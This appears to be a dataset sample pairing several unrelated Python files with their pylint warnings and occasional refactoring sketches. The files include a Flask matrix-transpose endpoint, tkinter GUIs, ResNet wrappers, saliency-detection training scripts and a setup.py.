1 # This could (and will) be better; I just needed a quick local 2 # proof of concept. An improved online version will come later. 3 4 import os, sys 5 6 BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # adds project dir to places it looks for the modules 7 sys.path.append(BASE_PATH) 8 9 from lib.board import Board 10 from lib.window import Window 11 12 b = Board() 13 win = Window(b) 14 15 win.main()
Clean Code: No Issues Detected
1 from flask import Flask, render_template, request, jsonify 2 from flask_cors import CORS 3 import json 4 import numpy as np 5 6 app = Flask(__name__) 7 CORS(app) 8 9 10 @app.route('/transpose', methods=["POST"]) 11 def homepage(): 12 data = request.json 13 result = None 14 error = "" 15 try: 16 mat = data["matrix"] 17 mat = np.array(mat) 18 result = mat.T.tolist() 19 error = "" 20 except KeyError as e: 21 error = "Key %s not found" % (str(e)) 22 pass 23 except Exception as e: 24 error = str(e) 25 pass 26 return jsonify({"result": result, "error": error}) 27 28 29 app.run()
23 - warning: broad-exception-caught 22 - warning: unnecessary-pass 25 - warning: unnecessary-pass 1 - warning: unused-import 3 - warning: unused-import
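A sketch of the handler without the unnecessary pass statements and with a narrower except clause (the concrete exception types are an assumption about what np.array and .T can raise, not taken from the source):

    import numpy as np
    from flask import Flask, request, jsonify

    app = Flask(__name__)

    @app.route('/transpose', methods=["POST"])
    def homepage():
        result, error = None, ""
        try:
            result = np.array(request.json["matrix"]).T.tolist()
        except KeyError as e:
            error = "Key %s not found" % str(e)  # the assignment ends the block; no pass needed
        except (TypeError, ValueError) as e:     # narrower than a blanket Exception
            error = str(e)
        return jsonify({"result": result, "error": error})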
1 from tkinter import * 2 from tkinter import ttk 3 from tkinter import filedialog 4 import test_python3 5 6 class Root(Tk): 7 def __init__(self): 8 super(Root, self).__init__() 9 self.title("Malware Detection") 10 self.minsize(500, 300) 11 12 self.labelFrame = ttk.LabelFrame(self, text = " Open File") 13 self.labelFrame.grid(column = 0, row = 1, padx = 200, pady = 20) 14 15 self.button() 16 17 18 19 def button(self): 20 self.button = ttk.Button(self.labelFrame, text = "Browse A File",command = self.fileDialog) 21 self.button.grid(column = 1, row = 1) 22 23 24 def fileDialog(self): 25 26 self.filename = filedialog.askopenfilename(initialdir = "/", title = "Select A File") 27 self.label = ttk.Label(self.labelFrame, text = "") 28 self.label.grid(column = 1, row = 2) 29 self.label.configure(text = self.filename) 30 31 32 33 34 root = Root() 35 root.mainloop()
1 - warning: wildcard-import 8 - refactor: super-with-arguments 15 - error: not-callable 19 - error: method-hidden 26 - warning: attribute-defined-outside-init 27 - warning: attribute-defined-outside-init 4 - warning: unused-import 1 - warning: unused-wildcard-import
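The method-hidden and not-callable errors share a cause: `self.button = ttk.Button(...)` inside the method named button replaces the bound method with the widget on the instance. Storing the widget under a different name avoids both; a sketch:

    from tkinter import Tk, ttk

    class Root(Tk):
        def __init__(self):
            super().__init__()  # Python 3 spelling, no arguments needed
            self.labelFrame = ttk.LabelFrame(self, text=" Open File")
            self.labelFrame.grid(column=0, row=1, padx=200, pady=20)
            self.make_button()

        def make_button(self):
            # widget name differs from the method name, so nothing is hidden
            self.browse_button = ttk.Button(self.labelFrame, text="Browse A File")
            self.browse_button.grid(column=1, row=1)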
1 from .resnext101 import ResNeXt101
1 - error: relative-beyond-top-level 1 - warning: unused-import
1 from .resnet import ResNet, BasicBlock, Bottleneck 2 import torch 3 from torch import nn 4 from .config import resnet50_path 5 6 model_urls = { 7 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth', 8 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth', 9 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', 10 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth', 11 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth', 12 } 13 14 class ResNet50(nn.Module): 15 def __init__(self): 16 super(ResNet50, self).__init__() 17 net = ResNet(last_stride=2, 18 block=Bottleneck, frozen_stages=False, 19 layers=[3, 4, 6, 3]) 20 net.load_param(resnet50_path) 21 22 self.layer0 = net.layer0 23 self.layer1 = net.layer1 24 self.layer2 = net.layer2 25 self.layer3 = net.layer3 26 self.layer4 = net.layer4 27 28 def forward(self, x): 29 layer0 = self.layer0(x) 30 layer1 = self.layer1(layer0) 31 layer2 = self.layer2(layer1) 32 layer3 = self.layer3(layer2) 33 layer4 = self.layer4(layer3) 34 return layer4 35 36 def load_param(self, trained_path): 37 param_dict = torch.load(trained_path) 38 for i in param_dict: 39 if 'classifier' in i or 'arcface' in i: 40 continue 41 self.state_dict()[i].copy_(param_dict[i]) 42 print('Loading pretrained model from {}'.format(trained_path)) 43 44 45 class ResNet50_BIN(nn.Module): 46 def __init__(self): 47 super(ResNet50_BIN, self).__init__() 48 net = ResNet(last_stride=2, 49 block=IN_Bottleneck, frozen_stages=False, 50 layers=[3, 4, 6, 3]) 51 net.load_param(resnet50_path) 52 53 self.layer0 = net.layer0 54 self.layer1 = net.layer1 55 self.layer2 = net.layer2 56 self.layer3 = net.layer3 57 self.layer4 = net.layer4 58 59 def forward(self, x): 60 layer0 = self.layer0(x) 61 layer1 = self.layer1(layer0) 62 layer2 = self.layer2(layer1) 63 layer3 = self.layer3(layer2) 64 layer4 = self.layer4(layer3) 65 return layer4 66 67 def load_param(self, trained_path): 68 param_dict = torch.load(trained_path) 69 for i in param_dict: 70 if 'classifier' in i or 'arcface' in i: 71 continue 72 self.state_dict()[i].copy_(param_dict[i]) 73 print('Loading pretrained model from {}'.format(trained_path)) 74 75 76 class ResNet50_LowIN(nn.Module): 77 def __init__(self): 78 super(ResNet50_LowIN, self).__init__() 79 net = ResNet_LowIN(last_stride=2, 80 block=Bottleneck, frozen_stages=False, 81 layers=[3, 4, 6, 3]) 82 net.load_param(resnet50_path) 83 84 self.layer0 = net.layer0 85 self.layer1 = net.layer1 86 self.layer2 = net.layer2 87 self.layer3 = net.layer3 88 self.layer4 = net.layer4 89 90 def forward(self, x): 91 layer0 = self.layer0(x) 92 layer1 = self.layer1(layer0) 93 layer2 = self.layer2(layer1) 94 layer3 = self.layer3(layer2) 95 layer4 = self.layer4(layer3) 96 return layer4 97 98 def load_param(self, trained_path): 99 param_dict = torch.load(trained_path) 100 for i in param_dict: 101 if 'classifier' in i or 'arcface' in i: 102 continue 103 self.state_dict()[i].copy_(param_dict[i]) 104 print('Loading pretrained model from {}'.format(trained_path))
1 - error: relative-beyond-top-level 4 - error: relative-beyond-top-level 16 - refactor: super-with-arguments 47 - refactor: super-with-arguments 49 - error: undefined-variable 78 - refactor: super-with-arguments 79 - error: undefined-variable 1 - warning: unused-import
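IN_Bottleneck and ResNet_LowIN are referenced but never imported, hence the two undefined-variable errors. If they live in the same .resnet module as the other blocks, which is an assumption the source does not confirm, extending the first import would fix both:

    # assumption: IN_Bottleneck and ResNet_LowIN are defined in .resnet
    # alongside ResNet, BasicBlock and Bottleneck
    from .resnet import ResNet, ResNet_LowIN, BasicBlock, Bottleneck, IN_Bottleneck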
1 resnet50_path = './resnet/resnet50-19c8e357.pth'
Clean Code: No Issues Detected
1 from .make_model import ResNet50, ResNet50_BIN, ResNet50_LowIN
1 - error: relative-beyond-top-level 1 - warning: unused-import 1 - warning: unused-import 1 - warning: unused-import
1 import datetime 2 import os 3 import time 4 5 import torch 6 from torch import nn 7 from torch import optim 8 from torch.autograd import Variable 9 from torch.utils.data import DataLoader 10 from torchvision import transforms 11 import pandas as pd 12 import numpy as np 13 14 import joint_transforms 15 from config import msra10k_path, MTDD_train_path 16 from datasets import ImageFolder_joint 17 from misc import AvgMeter, check_mkdir, cal_sc 18 from model import R3Net, SDCNet 19 from torch.backends import cudnn 20 21 cudnn.benchmark = True 22 23 torch.manual_seed(2021) 24 torch.cuda.set_device(6) 25 26 csv_path = './label_DUTS-TR.csv' 27 ckpt_path = './ckpt' 28 exp_name ='SDCNet' 29 30 args = { 31 'iter_num': 30000, 32 'train_batch_size': 16, 33 'last_iter': 0, 34 'lr': 1e-3, 35 'lr_decay': 0.9, 36 'weight_decay': 5e-4, 37 'momentum': 0.9, 38 'snapshot': '' 39 } 40 41 joint_transform = joint_transforms.Compose([ 42 joint_transforms.RandomCrop(300), 43 joint_transforms.RandomHorizontallyFlip(), 44 joint_transforms.RandomRotate(10) 45 ]) 46 img_transform = transforms.Compose([ 47 transforms.ToTensor(), 48 transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) 49 ]) 50 target_transform = transforms.ToTensor() 51 to_pil = transforms.ToPILImage() 52 53 all_data = pd.read_csv(csv_path) 54 train_set = ImageFolder_joint(all_data, joint_transform, img_transform, target_transform) 55 train_loader = DataLoader(train_set, batch_size=args['train_batch_size'], num_workers=0, shuffle=True, drop_last=True)# 56 57 log_path = os.path.join(ckpt_path, exp_name, str(datetime.datetime.now()) + '.txt') 58 59 60 def main(): 61 net = SDCNet(num_classes = 5).cuda().train() # 62 63 print('training in ' + exp_name) 64 optimizer = optim.SGD([ 65 {'params': [param for name, param in net.named_parameters() if name[-4:] == 'bias'], 66 'lr': 2 * args['lr']}, 67 {'params': [param for name, param in net.named_parameters() if name[-4:] != 'bias'], 68 'lr': args['lr'], 'weight_decay': args['weight_decay']} 69 ], momentum=args['momentum']) 70 71 if len(args['snapshot']) > 0: 72 print('training resumes from ' + args['snapshot']) 73 net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth'))) 74 optimizer.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '_optim.pth'))) 75 optimizer.param_groups[0]['lr'] = 2 * args['lr'] 76 optimizer.param_groups[1]['lr'] = args['lr'] 77 78 check_mkdir(ckpt_path) 79 check_mkdir(os.path.join(ckpt_path, exp_name)) 80 open(log_path, 'w').write(str(args) + '\n\n') 81 train(net, optimizer) 82 83 84 def train(net, optimizer): 85 start_time = time.time() 86 curr_iter = args['last_iter'] 87 num_class = [0, 0, 0, 0, 0] 88 while True: 89 total_loss_record, loss0_record, loss1_record, loss2_record = AvgMeter(), AvgMeter(), AvgMeter(), AvgMeter() 90 91 batch_time = AvgMeter() 92 end = time.time() 93 print('-----begining the first stage, train_mode==0-----') 94 for i, data in enumerate(train_loader): 95 optimizer.param_groups[0]['lr'] = 2 * args['lr'] * (1 - float(curr_iter) / args['iter_num'] 96 ) ** args['lr_decay'] 97 optimizer.param_groups[1]['lr'] = args['lr'] * (1 - float(curr_iter) / args['iter_num'] 98 ) ** args['lr_decay'] 99 100 inputs, gt, labels = data 101 print(labels) 102 # depends on the num of classes 103 cweight = torch.tensor([0.5, 0.75, 1, 1.25, 1.5]) 104 #weight = torch.ones(size=gt.shape) 105 weight = gt.clone().detach() 106 sizec = labels.numpy() 107 #ta = np.zeros(shape=gt.shape) 108 ''' 109 
np.zeros(shape=labels.shape) 110 sc = gt.clone().detach() 111 for i in range(len(sizec)): 112 gta = np.array(to_pil(sc[i,:].data.squeeze(0).cpu()))# 113 #print(gta.shape) 114 labels[i] = cal_sc(gta) 115 sizec[i] = labels[i] 116 print(labels) 117 ''' 118 batch_size = inputs.size(0) 119 inputs = Variable(inputs).cuda() 120 gt = Variable(gt).cuda() 121 labels = Variable(labels).cuda() 122 123 #print(sizec.shape) 124 125 optimizer.zero_grad() 126 p5, p4, p3, p2, p1, predict1, predict2, predict3, predict4, predict5, predict6, predict7, predict8, predict9, predict10, predict11 = net(inputs, sizec) # mode=1 127 128 criterion = nn.BCEWithLogitsLoss().cuda() 129 criterion2 = nn.CrossEntropyLoss().cuda() 130 131 gt2 = gt.long() 132 gt2 = gt2.squeeze(1) 133 134 l5 = criterion2(p5, gt2) 135 l4 = criterion2(p4, gt2) 136 l3 = criterion2(p3, gt2) 137 l2 = criterion2(p2, gt2) 138 l1 = criterion2(p1, gt2) 139 140 loss0 = criterion(predict11, gt) 141 loss10 = criterion(predict10, gt) 142 loss9 = criterion(predict9, gt) 143 loss8 = criterion(predict8, gt) 144 loss7 = criterion(predict7, gt) 145 loss6 = criterion(predict6, gt) 146 loss5 = criterion(predict5, gt) 147 loss4 = criterion(predict4, gt) 148 loss3 = criterion(predict3, gt) 149 loss2 = criterion(predict2, gt) 150 loss1 = criterion(predict1, gt) 151 152 total_loss = l1 + l2 + l3 + l4 + l5 + loss0 + loss1 + loss2 + loss3 + loss4 + loss5 + loss6 + loss7 + loss8 + loss9 + loss10 153 154 total_loss.backward() 155 optimizer.step() 156 157 total_loss_record.update(total_loss.item(), batch_size) 158 loss1_record.update(l5.item(), batch_size) 159 loss0_record.update(loss0.item(), batch_size) 160 161 curr_iter += 1.0 162 batch_time.update(time.time() - end) 163 end = time.time() 164 165 log = '[iter %d], [R1/Mode0], [total loss %.5f]\n' \ 166 '[l5 %.5f], [loss0 %.5f]\n' \ 167 '[lr %.13f], [time %.4f]' % \ 168 (curr_iter, total_loss_record.avg, loss1_record.avg, loss0_record.avg, optimizer.param_groups[1]['lr'], 169 batch_time.avg) 170 print(log) 171 print('Num of class:', num_class) 172 open(log_path, 'a').write(log + '\n') 173 174 if curr_iter == args['iter_num']: 175 torch.save(net.state_dict(), os.path.join(ckpt_path, exp_name, '%d.pth' % curr_iter)) 176 torch.save(optimizer.state_dict(), 177 os.path.join(ckpt_path, exp_name, '%d_optim.pth' % curr_iter)) 178 total_time = time.time() - start_time 179 print(total_time) 180 return 181 182 183 if __name__ == '__main__': 184 main()
16 - error: no-name-in-module 80 - refactor: consider-using-with 80 - warning: unspecified-encoding 84 - refactor: too-many-locals 108 - warning: pointless-string-statement 172 - refactor: consider-using-with 172 - warning: unspecified-encoding 84 - refactor: too-many-statements 89 - warning: unused-variable 94 - warning: unused-variable 103 - warning: unused-variable 105 - warning: unused-variable 12 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 17 - warning: unused-import 18 - warning: unused-import
1 import numpy as np 2 import os 3 4 import torch 5 from PIL import Image 6 from torch.autograd import Variable 7 from torchvision import transforms 8 from torch.utils.data import DataLoader 9 import matplotlib.pyplot as plt 10 import pandas as pd 11 from tqdm import tqdm 12 import cv2 13 import numpy as np 14 15 from config import ecssd_path, hkuis_path, pascals_path, sod_path, dutomron_path, MTDD_test_path 16 from misc import check_mkdir, crf_refine, AvgMeter, cal_precision_recall_mae, cal_fmeasure 17 from datasets import TestFolder_joint 18 import joint_transforms 19 from model import HSNet_single1, HSNet_single1_ASPP, HSNet_single1_NR, HSNet_single2, SDMS_A, SDMS_C 20 21 torch.manual_seed(2018) 22 23 # set which gpu to use 24 torch.cuda.set_device(0) 25 26 ckpt_path = './ckpt' 27 test_path = './test_ECSSD.csv' 28 29 30 def main(): 31 img = np.zeros((512, 512),dtype = np.uint8) 32 img2 = cv2.imread('./0595.PNG', 0) 33 cv2.imshow('img',img2) 34 #cv2.waitKey(0) 35 print(img, img2) 36 Image.fromarray(img).save('./free.png') 37 38 39 40 if __name__ == '__main__': 41 main()
13 - warning: reimported 17 - error: no-name-in-module 2 - warning: unused-import 6 - warning: unused-import 7 - warning: unused-import 8 - warning: unused-import 9 - warning: unused-import 10 - warning: unused-import 11 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 15 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 16 - warning: unused-import 17 - warning: unused-import 18 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import 19 - warning: unused-import
1 import os 2 import os.path 3 4 import torch.utils.data as data 5 from PIL import Image 6 7 8 class ImageFolder_joint(data.Dataset): 9 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 10 def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None): 11 imgs = [] 12 self.label_list = label_list 13 for index, row in label_list.iterrows(): 14 imgs.append((row['img_path'], row['gt_path'], row['label'])) 15 self.imgs = imgs 16 self.joint_transform = joint_transform 17 self.transform = transform 18 self.target_transform = target_transform 19 20 def __len__(self): 21 return len(self.label_list) 22 23 def __getitem__(self, index): 24 img_path, gt_path, label = self.imgs[index] 25 img = Image.open(img_path).convert('RGB') 26 target = Image.open(gt_path).convert('L') 27 if self.joint_transform is not None: 28 img, target = self.joint_transform(img, target) 29 if self.transform is not None: 30 img = self.transform(img) 31 if self.target_transform is not None: 32 target = self.target_transform(target) 33 34 return img, target, label 35 36 class ImageFolder_joint_for_edge(data.Dataset): 37 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 38 def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None): 39 imgs = [] 40 for index, row in label_list.iterrows(): 41 imgs.append((row['img_path'], row['gt_path'], row['label'])) 42 self.imgs = imgs 43 self.joint_transform = joint_transform 44 self.transform = transform 45 self.target_transform = target_transform 46 47 def __getitem__(self, index): 48 img_path, gt_path, label = self.imgs[index] 49 edge_path = "."+gt_path.split(".")[1]+"_edge."+gt_path.split(".")[2] 50 img = Image.open(img_path).convert('RGB') 51 target = Image.open(gt_path).convert('L') 52 target_edge = Image.open(edge_path).convert('L') 53 if self.joint_transform is not None: 54 if img.size != target.size or img.size != target_edge.size: 55 print("error path:", img_path, gt_path) 56 print("size:", img.size, target.size, target_edge.size) 57 img, target, target_edge = self.joint_transform(img, target, target_edge) 58 if self.transform is not None: 59 img = self.transform(img) 60 if self.target_transform is not None: 61 target = self.target_transform(target) 62 target_edge = self.target_transform(target_edge) 63 64 return img, target, target_edge, label 65 66 def __len__(self): 67 return len(self.imgs) 68 69 class TestFolder_joint(data.Dataset): 70 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 71 def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None): 72 imgs = [] 73 for index, row in label_list.iterrows(): 74 imgs.append((row['img_path'], row['gt_path'], row['label'])) 75 self.imgs = imgs 76 self.joint_transform = joint_transform 77 self.transform = transform 78 self.target_transform = target_transform 79 80 def __getitem__(self, index): 81 img_path, gt_path, label = self.imgs[index] 82 img = Image.open(img_path).convert('RGB') 83 target = Image.open(gt_path).convert('L') 84 if self.joint_transform is not None: 85 img, target = self.joint_transform(img, target) 86 if self.transform is not None: 87 img = self.transform(img) 88 if self.target_transform is not None: 89 target = self.target_transform(target) 90 91 return img, target, label, img_path 92 93 def __len__(self): 94 return len(self.imgs) 95 96 
97 def make_dataset(root): 98 img_list = [os.path.splitext(f)[0] for f in os.listdir(root) if f.endswith('.jpg')] 99 return [(os.path.join(root, img_name + '.jpg'), os.path.join(root, img_name + '.png')) for img_name in img_list] 100 101 102 class ImageFolder(data.Dataset): 103 # image and gt should be in the same folder and have same filename except extended name (jpg and png respectively) 104 def __init__(self, root, joint_transform=None, transform=None, target_transform=None): 105 self.root = root 106 self.imgs = make_dataset(root) 107 self.joint_transform = joint_transform 108 self.transform = transform 109 self.target_transform = target_transform 110 111 def __getitem__(self, index): 112 img_path, gt_path = self.imgs[index] 113 img = Image.open(img_path).convert('RGB') 114 target = Image.open(gt_path).convert('L') 115 if self.joint_transform is not None: 116 img, target = self.joint_transform(img, target) 117 if self.transform is not None: 118 img = self.transform(img) 119 if self.target_transform is not None: 120 target = self.target_transform(target) 121 122 return img, target 123 124 def __len__(self): 125 return len(self.imgs)
4 - refactor: consider-using-from-import 13 - warning: unused-variable 40 - warning: unused-variable 73 - warning: unused-variable
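The unused-variable warnings are the index bound by iterrows() and never read; the conventional underscore makes that intent explicit. A self-contained sketch (the one-row table is made up for illustration):

    import pandas as pd

    # hypothetical row, just to make the sketch runnable
    label_list = pd.DataFrame([{"img_path": "a.jpg", "gt_path": "a.png", "label": 0}])

    imgs = []
    for _, row in label_list.iterrows():  # '_' marks the unused index
        imgs.append((row["img_path"], row["gt_path"], row["label"]))
    print(imgs)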
1 import numpy as np 2 import os 3 4 import torch 5 from PIL import Image 6 from torch.autograd import Variable 7 from torchvision import transforms 8 from torch.utils.data import DataLoader 9 import matplotlib.pyplot as plt 10 import pandas as pd 11 from tqdm import tqdm 12 13 path_list = ['msra10k', 'ECSSD', 'DUT-OMROM', 'DUTS-TR', 'DUTS-TE', 'HKU-IS', 'PASCAL-S', 'SED2', 'SOC', 'SOD', 'THUR-15K'] 14 15 def main(): 16 Dataset, Class0, Class1, Class2, Class3, Class4, Class5, Class6, Class7, Class8, Class9, Class10, Total = [], [], [], [], [], [], [], [], [], [], [], [], [] 17 for data_path in path_list: 18 test_path = './SOD_label/label_' + data_path + '.csv' 19 print('Evaluate for ' + test_path) 20 test_data = pd.read_csv(test_path) 21 imgs = [] 22 num, c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10 = 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 23 for index, row in test_data.iterrows(): 24 imgs.append((row['img_path'], row['gt_path'], row['label'])) 25 img_path, gt_path, label = imgs[index] 26 27 if label == 0: 28 c0 += 1 29 elif label == 1: 30 c1 += 1 31 elif label == 2: 32 c2 += 1 33 elif label == 3: 34 c3 += 1 35 elif label == 4: 36 c4 += 1 37 elif label == 5: 38 c5 += 1 39 elif label == 6: 40 c6 += 1 41 elif label == 7: 42 c7 += 1 43 elif label == 8: 44 c8 += 1 45 elif label == 9: 46 c9 += 1 47 elif label == 10: 48 c10 += 1 49 num += 1 50 print('[Class0 %.f], [Class1 %.f], [Class2 %.f], [Class3 %.f]\n'\ 51 '[Class4 %.f], [Class5 %.f], [Class6 %.f], [Class7 %.f]\n'\ 52 '[Class8 %.f], [Class9 %.f], [Class10 %.f], [Total %.f]\n'%\ 53 (c0, c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, num) 54 ) 55 Dataset.append(data_path) 56 Class0.append(c0) 57 Class1.append(c1) 58 Class2.append(c2) 59 Class3.append(c3) 60 Class4.append(c4) 61 Class5.append(c5) 62 Class6.append(c6) 63 Class7.append(c7) 64 Class8.append(c8) 65 Class9.append(c9) 66 Class10.append(c10) 67 Total.append(num) 68 69 label_file = pd.DataFrame({'Datasets': Dataset, 'Class 0': Class0, 'Class 1': Class1, 'Class 2': Class2, 'Class 3': Class3, 'Class 4': Class4, 'Class 5': Class5, 'Class 6': Class6, 'Class 7': Class7, 'Class 8': Class8, 'Class 9': Class9, 'Class 10': Class10, 'Num of Pic': Total}) 70 label_file = label_file[['Datasets', 'Class 0', 'Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5', 'Class 6', 'Class 7', 'Class 8', 'Class 9', 'Class 10', 'Num of Pic']] 71 72 label_file.to_csv('./Dataset_statistics.csv', index=False) 73 74 if __name__ == '__main__': 75 main()
15 - refactor: too-many-locals 15 - refactor: too-many-branches 25 - warning: unused-variable 25 - warning: unused-variable 1 - warning: unused-import 2 - warning: unused-import 4 - warning: unused-import 5 - warning: unused-import 6 - warning: unused-import 7 - warning: unused-import 8 - warning: unused-import 9 - warning: unused-import 11 - warning: unused-import
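The too-many-branches warning comes from the eleven-way elif chain; because the label doubles as an index, a list of counters removes the chain entirely. A sketch of the counting core (the label values are made up):

    counts = [0] * 11                  # one slot per class label 0..10
    labels = [0, 3, 3, 10, 7, 0, 1]    # hypothetical label column
    for label in labels:
        counts[label] += 1
    print(counts, "total:", sum(counts))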
1 from setuptools import setup 2 3 setup( 4 name='pyhfss_parser', 5 version='0.0.0', 6 packages=['', 'venv.Lib.site-packages.py', 'venv.Lib.site-packages.py._io', 'venv.Lib.site-packages.py._log', 7 'venv.Lib.site-packages.py._code', 'venv.Lib.site-packages.py._path', 8 'venv.Lib.site-packages.py._process', 'venv.Lib.site-packages.py._vendored_packages', 9 'venv.Lib.site-packages.pip', 'venv.Lib.site-packages.pip._vendor', 10 'venv.Lib.site-packages.pip._vendor.idna', 'venv.Lib.site-packages.pip._vendor.pytoml', 11 'venv.Lib.site-packages.pip._vendor.certifi', 'venv.Lib.site-packages.pip._vendor.chardet', 12 'venv.Lib.site-packages.pip._vendor.chardet.cli', 'venv.Lib.site-packages.pip._vendor.distlib', 13 'venv.Lib.site-packages.pip._vendor.distlib._backport', 'venv.Lib.site-packages.pip._vendor.msgpack', 14 'venv.Lib.site-packages.pip._vendor.urllib3', 'venv.Lib.site-packages.pip._vendor.urllib3.util', 15 'venv.Lib.site-packages.pip._vendor.urllib3.contrib', 16 'venv.Lib.site-packages.pip._vendor.urllib3.contrib._securetransport', 17 'venv.Lib.site-packages.pip._vendor.urllib3.packages', 18 'venv.Lib.site-packages.pip._vendor.urllib3.packages.backports', 19 'venv.Lib.site-packages.pip._vendor.urllib3.packages.ssl_match_hostname', 20 'venv.Lib.site-packages.pip._vendor.colorama', 'venv.Lib.site-packages.pip._vendor.html5lib', 21 'venv.Lib.site-packages.pip._vendor.html5lib._trie', 22 'venv.Lib.site-packages.pip._vendor.html5lib.filters', 23 'venv.Lib.site-packages.pip._vendor.html5lib.treewalkers', 24 'venv.Lib.site-packages.pip._vendor.html5lib.treeadapters', 25 'venv.Lib.site-packages.pip._vendor.html5lib.treebuilders', 'venv.Lib.site-packages.pip._vendor.lockfile', 26 'venv.Lib.site-packages.pip._vendor.progress', 'venv.Lib.site-packages.pip._vendor.requests', 27 'venv.Lib.site-packages.pip._vendor.packaging', 'venv.Lib.site-packages.pip._vendor.cachecontrol', 28 'venv.Lib.site-packages.pip._vendor.cachecontrol.caches', 29 'venv.Lib.site-packages.pip._vendor.webencodings', 'venv.Lib.site-packages.pip._vendor.pkg_resources', 30 'venv.Lib.site-packages.pip._internal', 'venv.Lib.site-packages.pip._internal.req', 31 'venv.Lib.site-packages.pip._internal.vcs', 'venv.Lib.site-packages.pip._internal.utils', 32 'venv.Lib.site-packages.pip._internal.models', 'venv.Lib.site-packages.pip._internal.commands', 33 'venv.Lib.site-packages.pip._internal.operations', 'venv.Lib.site-packages.attr', 34 'venv.Lib.site-packages.pluggy', 'venv.Lib.site-packages._pytest', 'venv.Lib.site-packages._pytest.mark', 35 'venv.Lib.site-packages._pytest._code', 'venv.Lib.site-packages._pytest.config', 36 'venv.Lib.site-packages._pytest.assertion', 'venv.Lib.site-packages.colorama', 37 'venv.Lib.site-packages.atomicwrites', 'venv.Lib.site-packages.parsimonious', 38 'venv.Lib.site-packages.parsimonious.tests', 'venv.Lib.site-packages.more_itertools', 39 'venv.Lib.site-packages.more_itertools.tests', 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip', 40 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.req', 41 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.vcs', 42 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.utils', 43 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.compat', 44 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.models', 45 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor', 46 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib', 47 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.distlib._backport', 48 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.colorama', 49 
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib', 50 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib._trie', 51 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.filters', 52 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treewalkers', 53 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treeadapters', 54 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.html5lib.treebuilders', 55 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.lockfile', 56 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.progress', 57 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests', 58 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages', 59 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.chardet', 60 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3', 61 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.util', 62 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.contrib', 63 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages', 64 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.requests.packages.urllib3.packages.ssl_match_hostname', 65 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.packaging', 66 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol', 67 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.cachecontrol.caches', 68 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.webencodings', 69 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip._vendor.pkg_resources', 70 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.commands', 71 'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.operations'], 72 url='', 73 license='MIT', 74 author='Ariksu', 75 author_email='ariksu@gmail.com', 76 description='Attempt to write peg-parser for .hfss' 77 )
Clean Code: No Issues Detected
